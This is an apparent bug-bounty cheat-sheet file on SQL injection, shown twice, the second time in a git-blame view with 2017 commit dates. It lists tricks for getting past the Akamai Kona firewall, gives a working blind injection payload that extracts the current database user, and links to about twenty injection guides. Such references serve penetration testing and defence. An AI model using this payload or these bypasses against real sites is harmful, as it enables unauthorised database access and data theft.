bugbounty-cheatsheet/cheatsheets/sqli.md

## SQLI

**Akamai Kona Bypass**

* `MID` instead of `SUBSTRING`
* `LIKE` instead of `=`
* `/**/` instead of a `space`
* `CURRENT_USER` instead of `CURRENT_USER()`
* ` "` instead of `'`

Final example: 

```sql
444/**/OR/**/MID(CURRENT_USER,1,1)/**/LIKE/**/"p"/**/#
```

**Blogs**

* http://pentestmonkey.net/blog/mssql-sql-injection-cheat-sheet/
* http://isc.sans.edu/diary.html?storyid=9397
* http://ferruh.mavituna.com/sql-injection-cheatsheet-oku/
* http://www.evilsql.com/main/index.php
* http://xd-blog.com.ar/descargas/manuales/bugs/full-mssql-injection-pwnage.html
* http://securityoverride.com/articles.php?article_id=1&article=The_Complete_Guide_to_SQL_Injections
* http://websec.wordpress.com/2010/03/19/exploiting-hard-filtered-sql-injections/
* http://sqlzoo.net/hack/
* http://www.sqlteam.com/article/sql-server-versions
* http://www.krazl.com/blog/?p=3
* http://www.owasp.org/index.php/Testing_for_MS_Access
* http://web.archive.org/web/20101112061524/http://seclists.org/pen-test/2003/May/0074.html
* http://web.archive.org/web/20080822123152/http://www.webapptest.org/ms-access-sql-injection-cheat-sheet-EN.html
* http://www.youtube.com/watch?v=WkHkryIoLD0
* http://layerone.info/archives/2009/Joe%20McCray%20-%20Advanced%20SQL%20Injection%20-%20L1%202009.pdf
* http://vimeo.com/3418947
* http://sla.ckers.org/forum/read.php?24,33903
* http://websec.files.wordpress.com/2010/11/sqli2.pdf
* http://old.justinshattuck.com/2007/01/18/mysql-injection-cheat-sheet/
* http://ha.ckers.org/sqlinjection/
* http://lab.mediaservice.net/notes_more.php?id=MSSQL
Add individual files. 2017-07-14 13:54:44 +00:00			`## SQLI`

			`Akamai Kona Bypass`

			* `MID` instead of `SUBSTRING`
			* `LIKE` instead of `=`
			* `/**/` instead of a `space`
			* `CURRENT_USER` instead of `CURRENT_USER()`
			* ` "` instead of `'`

			`Final example:`

			```sql
			`444//OR//MID(CURRENT_USER,1,1)//LIKE//"p"/**/#`
Update sqli.md 2017-10-04 18:29:39 +00:00			```

			`Blogs`

			`* http://pentestmonkey.net/blog/mssql-sql-injection-cheat-sheet/`
			`* http://isc.sans.edu/diary.html?storyid=9397`
			`* http://ferruh.mavituna.com/sql-injection-cheatsheet-oku/`
			`* http://www.evilsql.com/main/index.php`
			`* http://xd-blog.com.ar/descargas/manuales/bugs/full-mssql-injection-pwnage.html`
			`* http://securityoverride.com/articles.php?article_id=1&article=The_Complete_Guide_to_SQL_Injections`
			`* http://websec.wordpress.com/2010/03/19/exploiting-hard-filtered-sql-injections/`
			`* http://sqlzoo.net/hack/`
			`* http://www.sqlteam.com/article/sql-server-versions`
			`* http://www.krazl.com/blog/?p=3`
			`* http://www.owasp.org/index.php/Testing_for_MS_Access`
			`* http://web.archive.org/web/20101112061524/http://seclists.org/pen-test/2003/May/0074.html`
			`* http://web.archive.org/web/20080822123152/http://www.webapptest.org/ms-access-sql-injection-cheat-sheet-EN.html`
			`* http://www.youtube.com/watch?v=WkHkryIoLD0`
			`* http://layerone.info/archives/2009/Joe%20McCray%20-%20Advanced%20SQL%20Injection%20-%20L1%202009.pdf`
			`* http://vimeo.com/3418947`
			`* http://sla.ckers.org/forum/read.php?24,33903`
			`* http://websec.files.wordpress.com/2010/11/sqli2.pdf`
			`* http://old.justinshattuck.com/2007/01/18/mysql-injection-cheat-sheet/`
			`* http://ha.ckers.org/sqlinjection/`
			`* http://lab.mediaservice.net/notes_more.php?id=MSSQL`